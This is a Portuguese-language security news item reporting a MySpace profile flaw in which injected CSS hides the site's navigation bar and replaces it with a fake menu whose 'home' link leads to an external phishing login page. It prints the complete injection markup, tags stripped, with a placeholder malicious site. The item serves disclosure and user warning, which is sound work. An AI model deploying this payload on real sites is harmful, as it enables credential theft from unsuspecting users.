Falha na página de usuário do famoso site de relacionamento myspace.com, possibilita introdução de código malicioso em css.
O site underground caughq.org publicou um relatório sobre uma falha na página de usuário do famoso site de relacionamento myspace.com, possibilitando introdução de código malicioso em css.
O myspace tem um menu de navegação no topo de todas as páginas, assim usuários o usam para navegarem por todo o site.O menu contém o botão home que leva para a página do usuário. Podendo assim, com um código malicioso redirecionar o usuário para uma página externa contendo um form de login. Como o site tem o costume de expirar os logins com muita facilidade, a vítima não achará estranho ser levado para tal site malicioso.
O site sugere que o myspace não permita que usuários possam introduzir códigos em css nos seus profiles.
A TotalSecurity recomenda ao usuário do myspace verificar sempre a existência de um cadeado na parte superior ou inferior do browser(dependendo do mesmo), se tem o prefixo HTTPS no endereço e lógico, se na barra de endereços contém myspace.com .
*Código completo(sem tags), onde o atacante botará na parte About Me para substituir o menu original:
-
style type=text/css
div table td font {display: none;}
/style
div background-color:000000; position:absolute; top:125px; left:50%; margin-left:-395px; width:790px; height:15px; />
a href=http://www.SITE MALICIOSO.com/login.html target=font
font |/font
a href=http://browseusers.myspace.com/browse/browse.aspx? target=font
font |/font
a href=http://search.myspace.com/index.cfm?fuseaction=find target=font
font |/font
a href=http://invite.myspace.com/index.cfm?fuseaction=invite target=font
font |/font
a href=http://www.myspace.com/index.cfm?fuseaction=film target=font
font |/font
a href=http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox target=font
font |/font
a href=http://blog.myspace.com/index.cfm?fuseaction=blog.controlcenter target=font
font |/font
a href=http://favorites.myspace.com/index.cfm?fuseaction=user.favorites target=font
font |/font
a href=http://forum.myspace.com/index.cfm?fuseaction=messageboard.categories target=font
font |/font
a href=http://groups.myspace.com/index.cfm?fuseaction=groups.categories target=font
font |/font
a href=http://events.myspace.com/index.cfm?fuseaction=events target=font
font |/font
a href=http://www.myspace.com/index.cfm?fuseaction=vids target=font
font |/font
a href=http://www.myspace.com/index.cfm?fuseaction=music target=font
font |/font
a href=http://www.myspace.com/index.cfm?fuseaction=comedian.home target=font
font |/font
a href=http://classifieds.myspace.com/index.cfm?fuseaction=classifieds target=font
/divstyle type=text/cssdiv div table tr td a.navbar, div div table tr td font {display: none;}/style
